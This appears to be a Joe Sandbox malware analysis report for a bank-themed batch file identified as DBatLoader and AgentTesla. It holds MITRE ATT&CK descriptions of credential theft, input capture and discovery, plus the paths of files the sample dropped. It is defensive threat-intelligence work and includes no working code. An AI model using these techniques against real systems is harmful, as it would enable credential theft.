Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\Wisrysxl

C:\Users\Public\Libraries\Wisrysxl.PIF

C:\Users\Public\Libraries\lxsyrsiW.cmd

C:\Users\Public\Libraries\lxsyrsiW.pif

C:\Users\Public\Wisrysxl.url

C:\Users\Public\alpha.pif

C:\Users\Public\xpha.pif

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre